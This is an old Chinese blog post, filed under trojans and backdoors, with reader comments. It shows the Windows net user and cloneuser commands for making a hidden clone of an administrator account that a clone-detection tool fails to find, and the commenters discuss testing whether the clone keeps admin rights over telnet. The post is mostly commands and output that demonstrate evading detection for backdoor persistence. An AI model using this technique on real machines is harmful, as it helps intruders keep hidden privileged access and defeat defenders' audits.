CSDN博客

img freexploit

隐形的克隆帐号测试(测试成功^_^)(ALLyeSNO)

发表于2004/12/29 16:23:00  1788人阅读

分类: 原创文章 木马后门

利用了 检测程序的漏洞

通过比较 注册表的 f 和 v键值

C:/WINNT/system32>net user allyesno babybear /add
命令成功完成。

C:/WINNT/system32>net localgroup administrators allyesno /add
命令成功完成。


C:/WINNT/system32>net user hideclone babybear /add
命令成功完成。


C:/WINNT/system32>cloneuser allyesno hideclone

C:/WINNT/system32>net user allyesno /delete
命令成功完成。

C:/WINNT/system32>net user hideclone
用户名 hideclone
本地组会员 *Users
全局组成员 *None
命令成功完成。

检测


[Melody]#checkclone

No Clone Is Found

Check Account Clone Complete

[Melody]#^_^ 成功



WinEggDrop
我怀疑被克隆的帐号是否还具有Administrators组的权限.


zzzevazzz
opentelnet
然后用hideclone登陆telnet,再尝试启动或停止服务。
如果可以,那就是admin。

WinEggDrop
it's not in Administrators group is the original account is deleted


allyesno
嗯 失去了 ad的权限 wineggdrop的置疑是正确的

另外倒是引出了 我的另一个思路 刚才已经测试过了

通过这个方法 将原有的ad权限帐号A 克隆成其他ad权限的帐号B

然后再把B进行删除 虽然 这个A帐号在查看的时候仍然是在administrators组 但是已经不具备ad权限 通过这个 可以做一些帐号限制

不知道 我这个想法 还有什么瑕疵吗?

0 0

相关博文

我的热门文章

img
取 消
img